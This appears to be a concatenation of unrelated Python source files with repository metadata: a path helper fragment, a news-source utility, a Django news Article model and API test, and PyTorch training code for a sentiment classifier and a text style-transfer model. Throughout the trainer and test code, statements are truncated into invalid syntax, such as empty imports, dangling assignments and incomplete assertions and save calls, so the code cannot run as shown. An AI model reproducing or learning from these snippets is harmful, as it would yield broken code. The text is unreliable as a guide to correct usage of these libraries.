Tuple[Path, Path]: if path1.stem == path2.stem: return (cython_settings.unique_stem_func(path1), cython_settings.unique_stem_func(path2)) if == return cython_settings.unique_name_func(path1) return (path1, path2) ```
{ "source": "0dysseas/news-indicator", "score": 3 }
#### File: news-indicator/newsindicator/ ```python import json import os def print_json_object(obj): """ A JSON print helper function. """ print ('Printing JSON object') print (json.dumps(obj, indent=4)) def get_asset(asset='sources'): """ Gets the assets from the specified folder. """ absolute_path = os.path.dirname(os.path.abspath(__file__)) if asset is not 'sources': return os.path.join(absolute_path, 'assets/news_icon.png') return os.path.join(absolute_path, 'assets/news_sources.txt') def get_news_sources_from_file(): """ Gets the news sources from the file. """ source_file = get_asset() with open(source_file, 'r') as f: news_sources = dict() for line in f: if not line.startswith('#') and line.split(): split_line = line.split(' = ') news_sources[split_line[0]] = split_line[1].rstrip('\n') return news_sources def delete_redundant_items(json_news, keys_to_del): #deletes redundant items for item in keys_to_del: del json_news[item] return json_news ```
{ "source": "0dysseas/news", "score": 2 }
#### File: news_backend/core/ ```python from django.db import models class Article(models.Model): title = models.TextField(blank=False, default='Enter the article title here...') subHeader = models.TextField(blank=True) journalistName = models.TextField(blank=True) content = models.TextField(blank=False, default='Enter the article content here...') topic = models.TextField(blank=False, default='Enter the article topic here...') timeOfPublish = models.DateField(blank=False, null=True) # tags = ArrayField(models.CharField(max_length=250), blank=True, null=True) # TODO: Add image field def __str__(self): return '{article} by {journalist} written on {date}'.format(article=self.title, journalist=self.journalistName, date=self.timeOfPublish) ``` #### File: core/tests/ ```python from ..models import Article from ..serializers import ArticleSerializer from rest_framework import status from django.test import TestCase from rest_framework.test import APIClient client = APIClient() class GetAllArticlesTest(TestCase): """ Test class for GET /articles """ def setUp(self): Article.objects.create(id=1, content='The US impeachment inquiry emerges from behind closed doors at last.' 'more than a month, the process - which could end in a Senate vote on ' 'Donald Trump\'s removal from office - has been shrouded in mystery.The ' 'biggest revelations have come from leaks, anonymous media reports and ' 'voluminous deposition transcripts where even the most explosive and ' 'revealing moments can be drained of drama when presented on the written' 'page. That all changes on Wednesday. Here are four things to keep in ' 'mind as the lights go up and the cameras turn on in the House ' 'Intelligence Committee hearing room.', journalistName='<NAME>', timeOfPublish='2019-11-13', subHeader='The US impeachment inquiry emerges from behind closed doors at last.For more ' 'than a month, the process - which could end in a Senate vote on Donald ' 'Trump\'s removal from office - has been shrouded in mystery.', title='Trump impeachment inquiry', topic='World News') Article.objects.create(id=2, content='The recent flooding in Venice was caused by a combination of high spring ' 'tides and a meteorological storm surge driven by strong sirocco winds ' 'blowing north-eastwards across the Adriatic Sea. ' 'When these two events' 'coincide, we get what is known as Acqua Alta (high water).This latest ' 'Acqua Alta occurrence in Venice is the second highest tide in recorded ' 'history. However, if we look at the top 10 tides, five have occurred in ' 'the past 20 years and the most recent was only last year. While we should' 'try to avoid attributing a single event to climate change, the increased ' 'frequency of these exceptional tides is obviously a big concern. In our ' 'changing climate, sea levels are rising and a city such as Venice, which ' 'is also sinking, is particularly susceptible to such changes. The weather' 'patterns that have caused the Adriatic storm surge have been driven by a ' 'strong meridional (waving) jet stream across the northern hemisphere and ' 'this has fed a conveyor belt of low pressure systems into the central ' 'Mediterranean.One of the possible effects of a changing climate is that ' 'the jet stream will be more frequently meridional and blocked weather ' 'patterns such as these will also become more frequent. If this happens, ' 'there is a greater likelihood that these events will combine with ' 'astronomical spring tides and hence increase the chance of flooding in ' 'Venice. Furthermore, the meridional jet stream can be linked back to ' 'stronger typhoons in the north-west Pacific resulting in more frequent ' 'cold outbreaks in North America and an unsettled Mediterranean is another' 'one of the downstream effects.', journalistName='<NAME>', timeOfPublish='2019-11-12', subHeader='The recent flooding in Venice was caused by a ' 'combination of high spring tides and a ' 'meteorological storm surge driven by strong ' 'sirocco winds blowing north-eastwards across the ' 'Adriatic Sea.', title='Is climate change behind ' 'Venice Flooding?', topic='Top News, World News') Article.objects.create(id=3, content='Fuelled by rising international interest in why the Nordic countries are ' 'doing so well, three of the region’s top universities recently joined ' 'forces to launch the world’s first international master’s programme ' 'specialising in Nordic urban planning. Taught in English, it is a ' 'collaboration between Pinder’s team at Roskilde University, west of ' 'Copenhagen, researchers at Malmö University in southern Sweden and The ' 'Arctic University of Norway in Tromsø, 200 miles north of the Arctic ' 'circle. The first 32 students began the course in September and will each ' 'spend at least one semester in every location during the two-year ' 'programme.\“I have been travelling around the Nordics and I was very ' 'impressed by the green spaces, architecture which combines aesthetics and' ' utility, and mobility in urban spaces,\” says <NAME>, 32, an ' 'urban planner from Paris. He signed up to get a \“fresh gaze\” on his ' 'profession, but the multidisciplinary course has also attracted ' 'participants from Europe and North America with a diverse range of ' 'backgrounds, as well as graduates in urban planning or people who have ' 'spent time working in the sector. In the Nordics, a strong rail ' 'infrastructure connects most major cities, long-distance trains and buses ' 'are typically equipped with WiFi, and commuters can usually avoid driving ' 'to work \“There are so many places that can learn from Nordic perspectives' ' on planning,” argues <NAME>, a 27-year-old Danish student' ' taking the course. “I recently went to the US and travelled around the ' 'southern part. In Nashville, it was almost impossible getting around ' 'without a car and it was even difficult travelling between cities. Going ' 'on a bus [in the US], it was clear that it was mostly people from a ' 'specific socioeconomic background who took the bus.\” In the Nordics, a ' 'strong rail infrastructure connects most major cities, long-distance ' 'trains and buses are typically equipped with WiFi, and commuters can ' 'usually avoid driving to work. Of course, Nordic countries are much ' 'smaller than North America and have fewer large urban hubs, which means a' ' direct comparison is difficult. Yet Mikkelsen says the experience made ' 'her keenly aware of the benefits of investing in public transport. \“I ' 'realised it is very clear how quickly you accommodate yourself to living ' 'in a liveable city. I am so used to being able to walk or cycle ' 'everywhere,\” she reflects.', journalistName='<NAME>', timeOfPublish='2019-11-12', subHeader='Scandinavia is famous for its liveable cities, but a new university course ' 'in Nordic urban planning has raised questions about replicating the region’s ' 'approach elsewhere.', title='What the Nordic nations can teach us about liveable cities', topic='World News') Article.objects.create(id=4, content='A national culture that supports spending time alone as well as with ' 'friends is also something he values, alongside Finland’s ample nature and' ' low unemployment levels. “There’s a lot of jobs...if one is ready to ' 'apply and search for a job, then I think everyone can get a job,” ' 'he argues.', journalistName='<NAME>', timeOfPublish='2019-11-13', subHeader='Finland regularly tops global rankings as the ' 'happiest nation on the planet, but this brings a ' 'unique set of challenges for young people ' 'struggling with depression.', title='Being depressed in the \'world\'s happiest country\'', topic='Top News, World News') def test_get_all_articles(self): # get API response response = client.get('') # get data from db articles = Article.objects.all() serializer = ArticleSerializer(articles, many=True) self.assertEqual(, self.assertEqual(response.status_code, status.HTTP_200_OK) ```
{ "source": "0e4e6d01/non-parallel-text-style-transfer-using-self-attn-discriminator", "score": 3 }
#### File: non-parallel-text-style-transfer-using-self-attn-discriminator/classifier/ ```python import argparse def add_classifier_arguments(parser): parser.add_argument( "--num_labels", type=int, default=2, help="number of classes of labels" ) def add_cnn_classifier_arguments(parser): parser.add_argument( "--num_kernels_each_size", type=int, default=2, help="number of kernels of each size" ) parser.add_argument( "--kernel_sizes", type=int, default=[2, 3, 4], nargs='+', help="a list of kernel sizes" ) def add_rnn_classifier_arguments(parser): parser.add_argument( "--enc_num_layers", type=int, default=1, help="number of layer of encoder rnn" ) parser.add_argument( "--hidden_size", type=int, default=256, help="hidden size of rnn encoder" ) parser.add_argument( "--cell", type=str, default="LSTM", help="lstm or gru" ) parser.add_argument( "--enc_bidirectional", action="store_true", help="whether encoder is bi-directional" ) ``` #### File: non-parallel-text-style-transfer-using-self-attn-discriminator/classifier/ ```python import os import time import csv import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from import DataLoader from torch.nn.utils import clip_grad_norm_ as clip_grad_norm from sklearn.metrics import accuracy_score import matplotlib.pyplot as plt from utils import tokenization, optimization, constants, misc from import * def get_classification_data(data_dir, data_name): """ args: data_dir: str data_name: str return: data: dict of {"src_str": list of str, "lab": list of int} """ src_0, src_1 = [], [] with open(os.path.join(data_dir, data_name+".0"), 'r') as f: for line in f.readlines(): src_0.append(line.strip()) with open(os.path.join(data_dir, data_name+".1"), 'r') as f: for line in f.readlines(): src_1.append(line.strip()) lab_0 = [0] * len(src_0) lab_1 = [1] * len(src_1) src = src_0 + src_1 lab = lab_0 + lab_1 data = {"src_str": src, "lab": lab} print("%s data has been loaded" % data_name) for l, count in enumerate(np.bincount(data["lab"])): print("number of label %d: %d" % (l, count)) return data def load_and_cache_data(args, data_name, tokenizer): """ return: data: dict of {"src_str": list of str, "src_ind": list of int, "lab": list of int} """ sos_str = "_sos" if args.use_sos else "" eos_str = "_eos" if args.use_eos else "" mask_str = "_mask" if "mask" in args.vocab_file_name else "" cached_data_file = os.path.join( args.data_dir, f"cached_cls_{data_name}{sos_str}{eos_str}{mask_str}" ) if os.path.exists(cached_data_file) and not args.overwrite_cache: print("Loading data from cached data file %s" % cached_data_file) data = torch.load(cached_data_file) else: print("Creating cached data file from data at %s" % cached_data_file) data = get_classification_data(args.data_dir, data_name) index_src = [] str_src = [] sos_id, eos_id = tokenizer.SOS_ID, tokenizer.EOS_ID sos_token, eos_token = tokenizer.SOS_TOKEN, tokenizer.EOS_TOKEN if args.use_sos and args.use_eos: for text in data['src_str']: index_src.append([sos_id] + tokenizer.encode(text) + [eos_id]) str_src.append(' '.join([sos_token, text, eos_token])) elif args.use_sos: for text in data['src_str']: index_src.append([sos_id] + tokenizer.encode(text)) str_src.append(' '.join([sos_token, text])) elif args.use_eos: for text in data['src_str']: index_src.append(tokenizer.encode(text) + [eos_id]) str_src.append(' '.join([text, eos_token])) else: for text in data['src_str']: index_src.append(tokenizer.encode(text)) str_src.append(text) data['src_ind'] = index_src data['src_str'] = str_src, cached_data_file) return data class BasicTrainer: """ Basic Trainer """ def __init__(self, args, model, train_data=None, dev_data=None, test_data=None): self.args = args self.model = model self.optimizer = None self.scheduler = None self.train_dataloader = self.get_dataloader(train_data)\ if train_data else None self.dev_dataloader = self.get_dataloader(dev_data)\ if dev_data else None self.test_dataloader = self.get_dataloader(test_data)\ if test_data else None if self.train_dataloader: self.optimizer, self.scheduler = self.get_optimizer() def get_dataloader(self, data): args = self.args if args.mode == "train": shuffle = args.shuffle else: shuffle = False dataset = ClassifierDataset(data["src_ind"], data["lab"]) dataloader = DataLoader(dataset=dataset, batch_size=args.batch_size, shuffle=shuffle, num_workers=args.num_workers, collate_fn=ClassifierPaddingCollate) return dataloader def get_optimizer(self, params=None): args = self.args if params is None: params = self.model.parameters() train_dataloader = self.train_dataloader optimizer = optimization.get_optim(args, params) num_steps = len(train_dataloader) * args.num_train_epochs print("Total number of steps: %d" % num_steps) decay_step = len(train_dataloader) * args.decay_epoch if args.decay_epoch > 0: print("Step when lr starts to decay: %d" % decay_step) scheduler = optimization.get_constant_schedule_with_linear_decay( optimizer, decay_step=decay_step, num_training_steps=num_steps ) else: scheduler = optimization.get_constant_schedule(optimizer) return optimizer, scheduler def save_checkpoint(self, path): #, os.path.join(path, "")), os.path.join(path, "")) #, os.path.join(path, "")) #, os.path.join(path, "")) def train(self, train_dataloader=None): print("\n### TRAINING BEGINS ###") args = self.args model = self.model optimizer = self.optimizer scheduler = self.scheduler train_dataloader = train_dataloader if train_dataloader else self.train_dataloader model.train() loss_record = [] # loss at global_step 0, 1, 2 ... acc_record = [] global_step_record_for_eval = [] global_step = -1 model.zero_grad() start_time = time.time() for ep in range(args.num_train_epochs): for step, batch in enumerate(train_dataloader): global_step += 1 src, lab, src_len = batch src, lab =, try: outputs = model(src) loss = F.cross_entropy(outputs, lab, reduction='mean') loss.backward() g = clip_grad_norm(model.parameters(), args.max_grad_norm) optimizer.step() scheduler.step() model.zero_grad() loss_record.append(loss.item()) except RuntimeError as e: if 'out of memory' in str(e): print('|| WARNING: ran out of memory ||\n') if hasattr(torch.cuda, 'empty_cache'): torch.cuda.empty_cache() else: print('|| WARNING: fail to train ||\n') raise e if global_step > 0 and global_step % args.log_interval == 0: print( f"epoch: {ep} "\ f"step: {global_step} "\ f"loss: {loss.item():.4f} "\ f"||g||: {g:.2f} "\ f"time: {misc.timeBetween(start_time, time.time())}" ) if global_step > 0 and global_step % args.eval_interval == 0: print("\neval model at step: %d" % global_step) acc = self.evaluate() acc_record.append(acc) global_step_record_for_eval.append(global_step) checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step) if not os.path.exists(checkpoint_output_dir): os.mkdir(checkpoint_output_dir) print("Save checkpoint at %s" % checkpoint_output_dir) self.save_checkpoint(checkpoint_output_dir) model.train() print("### TRAINING ENDS ###\n") print("eval model at step: %d" % global_step) acc = self.evaluate() acc_record.append(acc) global_step_record_for_eval.append(global_step) checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step) if not os.path.exists(checkpoint_output_dir): os.mkdir(checkpoint_output_dir) print("Save checkpoint at %s" % checkpoint_output_dir) self.save_checkpoint(checkpoint_output_dir) train_record = loss_record eval_record = (acc_record, global_step_record_for_eval) best_acc = self.save_train_result(train_record, eval_record) return best_acc, train_record, eval_record def evaluate(self, eval_dataloader=None): eval_dataloader = eval_dataloader if eval_dataloader else self.dev_dataloader args = self.args model = self.model model.eval() total_loss = 0 total_preds, total_labs = [], [] start_time = time.time() with torch.no_grad(): for step, batch in enumerate(eval_dataloader): src, lab, src_len = batch total_labs.extend(lab.numpy().tolist()) src, lab =, try: outputs = model(src) total_loss += F.cross_entropy(outputs, lab, reduction='sum').item() total_preds.extend(torch.argmax(outputs, dim=1).cpu().numpy().tolist()) except RuntimeError as e: if 'out of memory' in str(e): print('|| WARNING: ran out of memory ||\n') if hasattr(torch.cuda, 'empty_cache'): torch.cuda.empty_cache() else: print('|| WARNING: fail to train ||\n') raise e acc = accuracy_score(total_labs, total_preds) print("==============================") print( "acc: {:.4f} loss: {:.4f} time: {}".format( acc, total_loss/len(total_labs), misc.timeBetween(start_time, time.time()) ) ) print("==============================\n") return acc def test(self, test_dataloader=None, save_res=None): test_dataloader = test_dataloader if test_dataloader else self.test_dataloader return self.evaluate(test_dataloader) def save_train_result(self, train_record, dev_record): args = self.args loss_record = train_record acc_record, gs_record = dev_record best_acc = np.max(acc_record) step_of_best_acc = gs_record[np.argmax(acc_record)] print("best acc: %.4f in step %d" % (best_acc, step_of_best_acc)) with open(os.path.join(args.output_dir, "training_result.log"), 'w') as f: f.write("best acc: %.4f at step %d\n" % (best_acc, step_of_best_acc)) plt.figure() plt.xlabel("step") plt.ylabel("acc") plt.plot(gs_record, acc_record) plt.tight_layout() plt.savefig(os.path.join(args.output_dir, "acc.pdf"), format='pdf') # bbox_inches='tight' plt.figure() plt.xlabel("step") plt.ylabel("loss") plt.plot(list(range(len(loss_record))), loss_record) plt.tight_layout() plt.savefig(os.path.join(args.output_dir, "loss.pdf"), format='pdf') return best_acc class CNNClassifierTrainer(BasicTrainer): """ CNN Classifier Trainer """ def __init__(self, args, model, train_data=None, dev_data=None, test_data=None, **kwargs): super(CNNClassifierTrainer, self).__init__( args, model, train_data, dev_data, test_data ) class SelfAttnRNNClassifierTrainer(BasicTrainer): """ Self-Attention RNN Classifier Trainer """ def __init__(self, args, model, train_data=None, dev_data=None, test_data=None, **kwargs): super(SelfAttnRNNClassifierTrainer, self).__init__( args, model, train_data, dev_data, test_data ) self.tokenizer = kwargs["tokenizer"] self.train_data = train_data self.dev_data = dev_data self.test_data = test_data if "mask" in args.vocab_file_name: self.args.mask_id = self.tokenizer.token2index["[mask]"] self.model.set_mask_id(self.args.mask_id) def train(self, train_dataloader=None): print("\n### TRAINING BEGINS ###") args = self.args model = self.model optimizer = self.optimizer scheduler = self.scheduler train_dataloader = train_dataloader if train_dataloader else self.train_dataloader model.train() loss_record = [] # loss at global_step 0, 1, 2 ... acc_record = [] global_step_record_for_eval = [] global_step = -1 pad_id = args.pad_id model.zero_grad() if args.freeze_emb_at_beginning: model.freeze_emb() start_time = time.time() for ep in range(args.num_train_epochs): if ep == args.unfreeze_at_ep and args.freeze_emb_at_beginning: model.unfreeze_emb() for step, batch in enumerate(train_dataloader): global_step += 1 src, lab, src_len = batch sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True) sorted_src = torch.index_select(src, dim=0, index=indices) sorted_lab = torch.index_select(lab, dim=0, index=indices) sorted_src, sorted_src_len =, sorted_lab = try: sorted_pad_mask = sorted_src == pad_id sorted_outputs, _ = model(sorted_src, sorted_src_len, sorted_pad_mask) loss = F.cross_entropy(sorted_outputs, sorted_lab, reduction='mean') loss.backward() g = clip_grad_norm(model.parameters(), args.max_grad_norm) optimizer.step() scheduler.step() model.zero_grad() loss_record.append(loss.item()) except RuntimeError as e: if 'out of memory' in str(e): print('|| WARNING: ran out of memory ||\n') if hasattr(torch.cuda, 'empty_cache'): torch.cuda.empty_cache() else: print('|| WARNING: fail to train ||\n') raise e if global_step > 0 and global_step % args.log_interval == 0: print( f"epoch: {ep} "\ f"step: {global_step} "\ f"loss: {loss.item():.4f} "\ f"||g||: {g:.2f} "\ f"time: {misc.timeBetween(start_time, time.time())}" ) if global_step > 0 and global_step % args.eval_interval == 0: print("\neval model at step: %d" % global_step) acc = self.evaluate() acc_record.append(acc) global_step_record_for_eval.append(global_step) checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step) if not os.path.exists(checkpoint_output_dir): os.mkdir(checkpoint_output_dir) print("Save checkpoint at %s" % checkpoint_output_dir) self.save_checkpoint(checkpoint_output_dir) model.train() print("### TRAINING ENDS ###\n") print("eval model at step: %d" % global_step) acc = self.evaluate() acc_record.append(acc) global_step_record_for_eval.append(global_step) checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step) if not os.path.exists(checkpoint_output_dir): os.mkdir(checkpoint_output_dir) print("Save checkpoint at %s" % checkpoint_output_dir) self.save_checkpoint(checkpoint_output_dir) train_record = loss_record eval_record = (acc_record, global_step_record_for_eval) best_acc = self.save_train_result(train_record, eval_record) return best_acc, train_record, eval_record def evaluate(self, eval_dataloader=None): eval_dataloader = eval_dataloader if eval_dataloader else self.dev_dataloader args = self.args model = self.model model.eval() total_loss = 0 total_preds, total_labs = [], [] pad_id = args.pad_id start_time = time.time() with torch.no_grad(): for step, batch in enumerate(eval_dataloader): src, lab, src_len = batch total_labs.extend(lab.numpy().tolist()) # src, lab =, sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True) _, resorted_indices = torch.sort(indices, dim=0) sorted_src = torch.index_select(src, dim=0, index=indices) sorted_lab = torch.index_select(lab, dim=0, index=indices) sorted_src, sorted_src_len =, sorted_lab = resorted_indices = try: sorted_pad_mask = sorted_src == pad_id sorted_outputs, _ = model(sorted_src, sorted_src_len, sorted_pad_mask) total_loss += F.cross_entropy(sorted_outputs, sorted_lab, reduction='sum').item() outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices) total_preds.extend(torch.argmax(outputs, dim=1).cpu().numpy().tolist()) except RuntimeError as e: if 'out of memory' in str(e): print('|| WARNING: ran out of memory ||\n') if hasattr(torch.cuda, 'empty_cache'): torch.cuda.empty_cache() else: print('|| WARNING: fail to train ||\n') raise e acc = accuracy_score(total_labs, total_preds) print("==============================") print( "acc: {:.4f} loss: {:.4f} time: {}".format( acc, total_loss/len(total_labs), misc.timeBetween(start_time, time.time()) ) ) print("==============================\n") return acc def test(self, test_dataloader=None, test_data=None, save_res=True): if test_dataloader is not None: assert test_data is not None else: test_dataloader = self.test_dataloader test_data = self.test_data test_lab = test_data['lab'] test_src_str = test_data['src_str'] args = self.args model = self.model model.eval() total_loss = 0 total_preds = [] # total_labs = [] total_weights = [] pad_id = args.pad_id start_time = time.time() with torch.no_grad(): for step, batch in enumerate(test_dataloader): src, lab, src_len = batch # total_labs.extend(lab.numpy().tolist()) sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True) _, resorted_indices = torch.sort(indices, dim=0) sorted_src = torch.index_select(src, dim=0, index=indices) sorted_lab = torch.index_select(lab, dim=0, index=indices) sorted_src, sorted_src_len =, sorted_lab = resorted_indices = try: sorted_pad_mask = sorted_src == pad_id sorted_outputs, sorted_weights = model(sorted_src, sorted_src_len, sorted_pad_mask) total_loss += F.cross_entropy(sorted_outputs, sorted_lab, reduction='sum').item() outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices) weights = torch.index_select(sorted_weights, dim=0, index=resorted_indices) total_preds.extend(torch.argmax(outputs, dim=1).cpu().numpy().tolist()) total_weights.extend(weights.cpu().numpy().tolist()) except RuntimeError as e: if 'out of memory' in str(e): print('|| WARNING: ran out of memory ||\n') if hasattr(torch.cuda, 'empty_cache'): torch.cuda.empty_cache() else: print('|| WARNING: fail to train ||\n') raise e acc = accuracy_score(test_lab, total_preds) print("==============================") print( "acc: {:.4f} loss: {:.4f} time: {}".format( acc, total_loss/len(test_lab), misc.timeBetween(start_time, time.time()) ) ) print("==============================\n") # print("type(test_src_str) is", type(test_src_str)) # <class 'list'> # print("type(test_src_str[0]) is", type(test_src_str[0])) # <class 'str'> # print("type(test_lab) is", type(test_lab)) # <class 'list'> # print("type(test_lab[0]) is", type(test_lab[0])) # <class 'int'> if save_res: with open(os.path.join(args.output_dir, "weights.csv"), 'w', newline='') as f: csv_writer = csv.writer(f) for ind, sample in enumerate(zip( test_lab, total_preds, test_src_str, total_weights )): lab, pred, src_str, weights = sample # src_str is a list csv_writer.writerow([f"#{ind}"] + src_str.strip().split()) csv_writer.writerow([f"lab: {lab} (pred: {pred})"] + [f"{w:.2f}" for w in weights]) return acc def gen_masked_src(self, data_name): if data_name == "train": dataloader = self.train_dataloader data = self.train_data elif data_name == "dev": dataloader = self.dev_dataloader data = self.dev_data elif data_name == "test": dataloader = self.test_dataloader data = self.test_data test_lab = data['lab'] test_src_str = data['src_str'] args = self.args model = self.model tokenizer = self.tokenizer model.eval() total_loss = 0 total_preds = [] # total_labs = [] total_weights = [] total_style_src = [] total_content_src = [] pad_id = args.pad_id start_time = time.time() with torch.no_grad(): for step, batch in enumerate(dataloader): src, lab, src_len = batch # total_labs.extend(lab.numpy().tolist()) sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True) _, resorted_indices = torch.sort(indices, dim=0) sorted_src = torch.index_select(src, dim=0, index=indices) sorted_lab = torch.index_select(lab, dim=0, index=indices) sorted_src, sorted_src_len =, sorted_lab = resorted_indices = try: sorted_pad_mask = sorted_src == pad_id sorted_outputs, sorted_weights, sorted_style_src,\ sorted_content_src = model.get_masked_src(sorted_src, sorted_src_len, sorted_pad_mask) total_loss += F.cross_entropy(sorted_outputs, sorted_lab, reduction='sum').item() outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices) weights = torch.index_select(sorted_weights, dim=0, index=resorted_indices) style_src = torch.index_select(sorted_style_src, dim=0, index=resorted_indices) content_src = torch.index_select(sorted_content_src, dim=0, index=resorted_indices) total_preds.extend(torch.argmax(outputs, dim=1).cpu().numpy().tolist()) total_weights.extend(weights.cpu().numpy().tolist()) total_style_src.extend(style_src.cpu().numpy().tolist()) total_content_src.extend(content_src.cpu().numpy().tolist()) except RuntimeError as e: if 'out of memory' in str(e): print('|| WARNING: ran out of memory ||\n') if hasattr(torch.cuda, 'empty_cache'): torch.cuda.empty_cache() else: print('|| WARNING: fail to train ||\n') raise e acc = accuracy_score(test_lab, total_preds) print("==============================") print( "acc: {:.4f} loss: {:.4f} time: {}".format( acc, total_loss/len(test_lab), misc.timeBetween(start_time, time.time()) ) ) print("==============================\n") # print("type(test_src_str) is", type(test_src_str)) # <class 'list'> # print("type(test_src_str[0]) is", type(test_src_str[0])) # <class 'str'> # print("type(test_lab) is", type(test_lab)) # <class 'list'> # print("type(test_lab[0]) is", type(test_lab[0])) # <class 'int'> total_src_tokens = [] total_style_tokens = [] total_content_tokens = [] with open(os.path.join(args.output_dir, f"{data_name}_weights.csv"), 'w', newline='') as f: csv_writer = csv.writer(f) for ind, sample in enumerate(zip( test_lab, total_preds, test_src_str, total_weights, total_style_src, total_content_src )): lab, pred, src_str, weights, style_src, content_src = sample # src_str is a list src_tokens = src_str.strip().split() csv_writer.writerow([f"#{ind}"] + list(map(lambda x:"'"+x, src_tokens))) csv_writer.writerow([f"lab: {lab} (pred: {pred})"] + [f"{w:.2f}" for w in weights]) content_tokens = tokenizer.index_to_token(content_src, include_sos_eos=False) style_tokens = tokenizer.index_to_token(style_src, include_sos_eos=False) total_src_tokens.append(src_tokens[1:-1]) total_style_tokens.append(style_tokens) total_content_tokens.append(content_tokens) return total_src_tokens, total_content_tokens, total_style_tokens ``` #### File: non-parallel-text-style-transfer-using-self-attn-discriminator/transfer/ ```python import os import time import csv import pickle import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from import DataLoader from torch.nn.utils import clip_grad_norm_ as clip_grad_norm from sklearn.metrics import accuracy_score import matplotlib.pyplot as plt from utils import tokenization, optimization, constants, misc from import * from utils.evaluator import BLEUEvaluator def get_transfer_data(data_dir, data_name): """ args: data_dir: str data_name: str return: data: dict of {"src_str": list of str, "lab": list of int} """ src_0, src_1 = [], [] with open(os.path.join(data_dir, data_name+".0"), 'r') as f: for line in f.readlines(): src_0.append(line.strip()) with open(os.path.join(data_dir, data_name+".1"), 'r') as f: for line in f.readlines(): src_1.append(line.strip()) lab_0 = [0] * len(src_0) lab_1 = [1] * len(src_1) src = src_0 + src_1 lab = lab_0 + lab_1 assert len(src) == len(lab) data = {"src_str": src, "lab": lab} print("%s data has been loaded" % data_name) for l, count in enumerate(np.bincount(data["lab"])): print("number of label %d: %d" % (l, count)) return data def load_and_cache_data(args, data_name, tokenizer): """ return: data: dict of {"src_str": list of str, "src_ind": list of int, "lab": list of int} """ sos_str = "_sos" if args.use_sos else "" eos_str = "_eos" if args.use_eos else "" mask_str = "_mask" if "mask" in args.vocab_file_name else "" cached_data_file = os.path.join( args.data_dir, f"cached_transfer_{data_name}{sos_str}{eos_str}{mask_str}" ) if os.path.exists(cached_data_file) and not args.overwrite_cache: print("Loading data from cached data file %s" % cached_data_file) data = torch.load(cached_data_file) else: print("Creating cached data file from data at %s" % cached_data_file) data = get_transfer_data(args.data_dir, data_name) index_src = [] str_src = [] sos_id, eos_id = tokenizer.SOS_ID, tokenizer.EOS_ID sos_token, eos_token = tokenizer.SOS_TOKEN, tokenizer.EOS_TOKEN if args.use_sos and args.use_eos: for text in data['src_str']: index_src.append([sos_id] + tokenizer.encode(text) + [eos_id]) str_src.append(' '.join([sos_token, text, eos_token])) elif args.use_sos: for text in data['src_str']: index_src.append([sos_id] + tokenizer.encode(text)) str_src.append(' '.join([sos_token, text])) elif args.use_eos: for text in data['src_str']: index_src.append(tokenizer.encode(text) + [eos_id]) str_src.append(' '.join([text, eos_token])) else: for text in data['src_str']: index_src.append(tokenizer.encode(text)) str_src.append(text) data['src_ind'] = index_src data['src_str'] = str_src, cached_data_file) return data def lambda_schedule(num_iter, start=0.0, stop=1.0, ratio=0.1): lambdas = np.ones(num_iter) * stop progress_interval = num_iter * ratio for i in range(int(progress_interval)): lambdas[i] *= i / progress_interval return lambdas class BasicTrainer: """ Basic Trainer """ def __init__(self, args, model, train_data=None, dev_data=None, test_data=None, tokenizer=None): self.args = args self.model = model self.optimizer = None self.scheduler = None self.train_dataloader = self.get_dataloader(train_data, "train")\ if train_data else None self.dev_dataloader = self.get_dataloader(dev_data, "dev")\ if dev_data else None self.test_dataloader = self.get_dataloader(test_data, "test")\ if test_data else None if self.train_dataloader: self.optimizer, self.scheduler = self.get_optimizer() def get_dataloader(self, data, data_name): args = self.args if data_name == "train": shuffle = args.shuffle batch_size = args.batch_size else: shuffle = False # batch_size = 2 batch_size = args.batch_size dataset = ClassifierDataset(data["src_ind"], data["lab"]) dataloader = DataLoader(dataset=dataset, batch_size=args.batch_size, shuffle=shuffle, num_workers=args.num_workers, collate_fn=ClassifierPaddingCollate) return dataloader def get_optimizer(self): args = self.args model = self.model train_dataloader = self.train_dataloader optimizer = optimization.get_optim(args, model.parameters()) num_steps = len(train_dataloader) * args.num_train_epochs args.num_steps = num_steps print("Total number of steps: %d" % num_steps) decay_step = len(train_dataloader) * args.decay_epoch if args.decay_epoch > 0: print("Step when lr starts to decay: %d" % decay_step) scheduler = optimization.get_constant_schedule_with_linear_decay( optimizer, decay_step=decay_step, num_training_steps=num_steps ) else: scheduler = optimization.get_constant_schedule(optimizer) return optimizer, scheduler def save_checkpoint(self, path): #, os.path.join(path, "")), os.path.join(path, "")) #, os.path.join(path, "")) #, os.path.join(path, "")) return def train(self): raise NotImplementedError() def evaluate(self): raise NotImplementedError() def test(self): raise NotImplementedError() def save_train_result(self, train_record, eval_record): args = self.args train_loss_record = train_record eval_bleu_record, eval_gs_record = eval_record best_bleu = np.max(eval_bleu_record) step_of_best_bleu = eval_gs_record[np.argmax(eval_bleu_record)] print("best BLEU: %.4f in step %d" % (best_bleu, step_of_best_bleu)) with open(os.path.join(args.output_dir, "training_result.log"), 'w') as f: f.write("best BLEU: %.4f in step %d" % (best_bleu, step_of_best_bleu)) plt.figure() plt.xlabel("step") plt.ylabel("BLEU") plt.plot(eval_gs_record, eval_bleu_record) plt.tight_layout() plt.savefig(os.path.join(args.output_dir, "bleu.pdf"), format='pdf') # bbox_inches='tight' plt.figure() plt.xlabel("step") plt.ylabel("loss") plt.plot(list(range(len(train_loss_record))), train_loss_record) # plt.plot(eval_gs_record, eval_loss_record) plt.tight_layout() plt.savefig(os.path.join(args.output_dir, "loss.pdf"), format='pdf') return best_bleu, step_of_best_bleu class TransferModelTrainer(BasicTrainer): def __init__(self, args, model, train_data=None, dev_data=None, test_data=None, **kwargs): super().__init__( args, model, train_data, dev_data, test_data ) self.tokenizer = kwargs["tokenizer"] if self.args.cls_model_path: print(f"Load classifier model form {self.args.cls_model_path}") self.model.classifier.load_state_dict( torch.load( os.path.join(self.args.cls_model_path, "") ) ) 